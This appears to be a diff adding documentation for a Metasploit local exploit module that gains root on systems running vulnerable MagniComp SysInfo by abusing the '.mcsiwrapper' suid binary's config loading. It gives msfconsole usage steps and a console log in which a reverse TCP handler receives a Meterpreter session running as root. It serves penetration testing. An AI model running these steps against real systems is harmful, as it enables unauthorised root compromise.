|
| 1 | +## Description |
| 2 | + |
| 3 | + This module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + [MagniComp SysInfo](https://www.magnicomp.com/sysinfo/) is a single system agent and viewer providing extensive IT asset inventory and configuration information for most major Linux, UNIX, Apple Macintosh, and Microsoft Windows platforms as well as leading NAS and SAN Storage Systems and logical volume software solutions. |
| 9 | + |
| 10 | + The `.mcsiwrapper` suid executable allows loading a config file using the `--configfile` argument. The `ExecPath` config directive is used to set the executable load path. This module abuses this functionality to set the load path resulting in execution of arbitrary code as root. |
| 11 | + |
| 12 | + This module has been tested successfully on SysInfo: |
| 13 | + |
| 14 | + * 10-H63 on Fedora 20 x86_64 |
| 15 | + * 10-GA on Solaris 10u11 x86 |
| 16 | + |
| 17 | + Installers: |
| 18 | + |
| 19 | + * https://www.magnicomp.com/cgi-bin/mcdownload.cgi |
| 20 | + * https://www.magnicomp.com/cgi-bin/mcdownload.cgi/Action=ListDDF |
| 21 | + |
| 22 | + |
| 23 | +## Verification Steps |
| 24 | + |
| 25 | + 1. Start `msfconsole` |
| 26 | + 2. Get a session |
| 27 | + 3. Do: `use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc` |
| 28 | + 4. Do: `set SESSION [SESSION]` |
| 29 | + 5. Do: `check` |
| 30 | + 6. Do: `run` |
| 31 | + 7. You should get a new *root* session |
| 32 | + |
| 33 | + |
| 34 | +## Options |
| 35 | + |
| 36 | + **SESSION** |
| 37 | + |
| 38 | + Which session to use, which can be viewed with `sessions` |
| 39 | + |
| 40 | + **SYSINFO_DIR** |
| 41 | + |
| 42 | + Path to SysInfo directory (default: `/opt/sysinfo`) |
| 43 | + |
| 44 | + **WritableDir** |
| 45 | + |
| 46 | + A writable directory file system path. (default: `/tmp`) |
| 47 | + |
| 48 | + |
| 49 | +## Scenarios |
| 50 | + |
| 51 | + ``` |
| 52 | + msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc |
| 53 | + msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1 |
| 54 | + session => 1 |
| 55 | + msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run |
| 56 | +
|
| 57 | + [*] Started reverse TCP handler on 172.16.191.244:4444 |
| 58 | + [*] Using target: Linux |
| 59 | + [*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ... |
| 60 | + [*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ... |
| 61 | + [*] Executing payload... |
| 62 | + [*] Sending stage (857352 bytes) to 172.16.191.137 |
| 63 | + [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500 |
| 64 | + [+] Deleted /tmp/.0rk4PC/vFdxxuBVkh |
| 65 | + [+] Deleted /tmp/.0rk4PC/eoGVzYwGa |
| 66 | + [+] Deleted /tmp/.0rk4PC |
| 67 | +
|
| 68 | + meterpreter > getuid |
| 69 | + Server username: uid=0, gid=1000, euid=1000, egid=1000 |
| 70 | + meterpreter > sysinfo |
| 71 | + Computer : localhost.localdomain |
| 72 | + OS : Fedora 20 (Linux 3.19.8-100.fc20.x86_64) |
| 73 | + Architecture : x64 |
| 74 | + BuildTuple : i486-linux-musl |
| 75 | + Meterpreter : x86/linux |
| 76 | + meterpreter > |
| 77 | + ``` |
| 78 | + |
0 commit comments